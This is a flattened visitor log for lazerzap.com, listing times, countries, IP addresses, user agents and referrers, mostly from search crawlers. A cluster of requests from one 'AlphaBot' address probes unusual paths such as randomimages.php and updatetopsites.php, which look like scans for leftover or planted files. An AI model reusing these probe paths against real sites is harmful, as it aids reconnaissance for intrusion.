[FTP] [TELNET] Linux Chrome Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36 http://notifyninja.com/monitoring No Referrer Jul 08 - 04:31 United States 66.249.66.80 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 08 - 04:56 Russian Federation 2.95.159.198 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win XP Firefox User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.12) Gecko/20101026 MRA 5.7 (build 03686) Firefox/3.6.12 http://lazerveneer.com/index.php?do=register Jul 08 - 04:56 Russian Federation 2.95.159.198 http://lazerzap.com/index.php?action=logout lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win XP Firefox User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.12) Gecko/20101026 MRA 5.7 (build 03686) Firefox/3.6.12 http://lazerveneer.com/index.php?do=register Jul 08 - 04:56 Russian Federation 2.95.159.198 http://lazerzap.com/index.php?do=register lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win XP Firefox User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.12) Gecko/20101026 MRA 5.7 (build 03686) Firefox/3.6.12 http://lazerveneer.com/index.php?do=register Jul 08 - 05:17 United States 66.249.66.66 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 08 - 05:53 China 106.8.210.164 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.99 http://lazerzap.com Jul 08 - 05:58 United States 66.249.66.78 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 08 - 06:59 United States 66.249.66.95 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 08 - 07:20 United States 66.249.66.217 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 08 - 07:37 United States 216.244.66.241 http://lazerzap.com/index.php/+/ts_files/randomimages.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com) No Referrer Jul 08 - 07:49 United States 216.244.66.241 http://www.lazerzap.com/index.php/component/users/updatetopsites.php www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com) No Referrer Jul 08 - 08:11 United States 66.249.66.66 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 08 - 08:27 United States 107.23.144.200 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Chrome Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36 http://notifyninja.com/monitoring No Referrer Jul 08 - 08:36 United States 66.249.66.80 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 08 - 08:38 United States 24.98.117.84 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 http://lazerzap.com Jul 08 - 08:51 United States 107.21.1.8 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com) http://lazerzap.com/ Jul 08 - 08:56 United States 66.249.66.221 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 08 - 09:11 United States 54.36.149.104 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 08 - 09:17 United States 54.36.149.98 http://lazerzap.com/index.php/mber/ts_files/randomimages.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 08 - 09:17 United States 66.249.66.64 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 09:47 United States 66.249.66.221 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 10:07 United States 66.249.66.219 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 10:40 United States 157.55.39.180 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 09 - 10:42 United States 40.77.167.159 http://lazerzap.com/index.php?m=wap lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 09 - 10:43 United States 66.249.66.64 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 10:48 United States 157.55.39.180 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 09 - 10:58 United States 66.249.66.217 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 11:15 Russian Federation 46.161.9.56 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 10.0; Win64; rv:33.1) Gecko/20100101 Firefox/33.1 https://lazerzap.com/ Jul 09 - 11:21 China 180.76.15.9 http://www.lazerzap.com/index.php/component/ts_files/ts_files/indexstyle.css www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 09 - 11:24 United States 66.249.66.217 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 11:31 China 123.125.143.192 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://www.baidu.com/s?wd=vaporjj7 Jul 09 - 11:42 China 123.125.143.158 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://www.baidu.com/s?wd=structuresxh Jul 09 - 12:04 United States 66.249.66.80 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 12:14 United States 66.249.66.66 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 12:20 United Kingdom 178.79.163.215 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Chrome Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11 No Referrer Jul 09 - 12:27 United States 107.23.144.200 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Chrome Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36 http://notifyninja.com/monitoring No Referrer Jul 09 - 12:29 United States 66.249.66.221 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 12:40 United States 66.249.66.219 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 13:00 United States 66.249.66.66 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 13:18 192.241.205.226 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36 No Referrer Jul 09 - 13:26 23.237.4.26 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AlphaBot/3.2; +http://alphaseobot.com/bot.html) No Referrer Jul 09 - 13:26 23.237.4.26 http://lazerzap.com/index.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AlphaBot/3.2; +http://alphaseobot.com/bot.html) No Referrer Jul 09 - 13:36 United States 66.249.66.79 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 13:37 23.237.4.26 http://lazerzap.com/index.php/admininstrator/visitor_data.html lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AlphaBot/3.2; +http://alphaseobot.com/bot.html) No Referrer Jul 09 - 13:37 23.237.4.26 http://lazerzap.com/index.php/magento/visitor_data.html lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AlphaBot/3.2; +http://alphaseobot.com/bot.html) No Referrer Jul 09 - 13:37 23.237.4.26 http://lazerzap.com/index.php/component/users/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AlphaBot/3.2; +http://alphaseobot.com/bot.html) No Referrer Jul 09 - 13:37 23.237.4.26 http://lazerzap.com/index.php/wp-json/wp/v2/posts/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AlphaBot/3.2; +http://alphaseobot.com/bot.html) No Referrer Jul 09 - 13:37 23.237.4.26 http://lazerzap.com/index.php/wp-json/wp/v2/posts/randomimages.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AlphaBot/3.2; +http://alphaseobot.com/bot.html) No Referrer Jul 09 - 13:37 23.237.4.26 http://lazerzap.com/index.php/wp-json/wp/v2/posts/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AlphaBot/3.2; +http://alphaseobot.com/bot.html) No Referrer Jul 09 - 13:37 23.237.4.26 http://lazerzap.com/index.php/wp-json/wp/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AlphaBot/3.2; +http://alphaseobot.com/bot.html) No Referrer Jul 09 - 13:37 23.237.4.26 http://lazerzap.com/index.php/wp-json/wp/randomimages.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AlphaBot/3.2; +http://alphaseobot.com/bot.html) No Referrer Jul 09 - 13:37 23.237.4.26 http://lazerzap.com/index.php/wp-json/wp/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AlphaBot/3.2; +http://alphaseobot.com/bot.html) No Referrer Jul 09 - 13:37 23.237.4.26 http://lazerzap.com/index.php/wp-json lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AlphaBot/3.2; +http://alphaseobot.com/bot.html) No Referrer Jul 09 - 13:38 23.237.4.26 http://lazerzap.com/index.php/randomimages.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AlphaBot/3.2; +http://alphaseobot.com/bot.html) No Referrer Jul 09 - 13:38 23.237.4.26 http://lazerzap.com/index.php/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AlphaBot/3.2; +http://alphaseobot.com/bot.html) No Referrer Jul 09 - 13:38 23.237.4.26 http://lazerzap.com/index.php/admininstrator/randomimages.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AlphaBot/3.2; +http://alphaseobot.com/bot.html) No Referrer Jul 09 - 13:38 23.237.4.26 http://lazerzap.com/index.php/admininstrator/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AlphaBot/3.2; +http://alphaseobot.com/bot.html) No Referrer Jul 09 - 13:38 23.237.4.26 http://lazerzap.com/index.php/component/users/randomimages.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AlphaBot/3.2; +http://alphaseobot.com/bot.html) No Referrer Jul 09 - 13:38 23.237.4.26 http://lazerzap.com/index.php/component/users/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AlphaBot/3.2; +http://alphaseobot.com/bot.html) No Referrer Jul 09 - 13:38 23.237.4.26 http://lazerzap.com/index.php/magento/randomimages.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AlphaBot/3.2; +http://alphaseobot.com/bot.html) No Referrer Jul 09 - 13:38 23.237.4.26 http://lazerzap.com/index.php/magento/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AlphaBot/3.2; +http://alphaseobot.com/bot.html) No Referrer Jul 09 - 13:38 23.237.4.26 http://lazerzap.com/index.php/+/ts_files/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AlphaBot/3.2; +http://alphaseobot.com/bot.html) No Referrer Jul 09 - 13:39 United States 52.83.191.29 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Mobile Safari/537.36 http://lazerzap.com/ Jul 09 - 13:44 China 180.76.15.135 http://www.lazerzap.com/index.php/component/ts_files/ts_files/visitor_data.html www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 09 - 13:48 United States 216.244.66.241 http://lazerzap.com/index.php?user/create_form/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com) No Referrer Jul 09 - 13:49 United States 157.55.39.180 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 09 - 14:08 Romania 109.102.111.64 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Java/1.6.0_04 No Referrer Jul 09 - 14:08 Romania 109.102.111.64 http://www.lazerzap.com/index.php www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Java/1.6.0_04 No Referrer Jul 09 - 14:28 United States 54.36.149.17 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 09 - 14:32 United States 66.249.66.66 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 14:36 China 123.207.95.146 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Internet Explorer 6 Mozilla/4.0 (compatible; MSIE 6.1; Windows NT) No Referrer Jul 09 - 14:36 China 42.236.102.3 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider http://lazerzap.com/ Jul 09 - 14:57 United States 66.249.66.78 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 14:59 Russian Federation 94.181.39.35 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47 http://lazerzap.com/ Jul 09 - 15:15 United States 66.249.66.78 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 15:54 United States 216.244.66.241 http://www.lazerzap.com/index.php/component/users/ts_files/scroll.js www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com) No Referrer Jul 09 - 15:58 Russian Federation 46.161.9.3 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Chrome Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36 https://lazerzap.com/ Jul 09 - 16:03 United States 66.249.66.79 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 16:28 Russian Federation 5.255.250.93 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) No Referrer Jul 09 - 16:32 Russian Federation 5.189.206.141 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47 http://lazerzap.com/ Jul 09 - 16:44 United States 66.249.66.221 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 17:19 United States 66.249.66.95 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 17:26 China 115.239.212.197 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://www.baidu.com/s?wd=suddenua8 Jul 09 - 17:30 United States 66.249.66.80 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 17:36 China 123.125.71.56 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 09 - 17:39 191.96.249.88 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown No Referrer Jul 09 - 17:40 United States 65.123.29.5 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win XP Internet Explorer 7 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) No Referrer Jul 09 - 18:04 Russian Federation 37.230.221.40 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Chrome Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11 No Referrer Jul 09 - 18:04 Russian Federation 37.230.221.40 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Chrome Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11 No Referrer Jul 09 - 18:12 United States 66.249.66.80 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 18:14 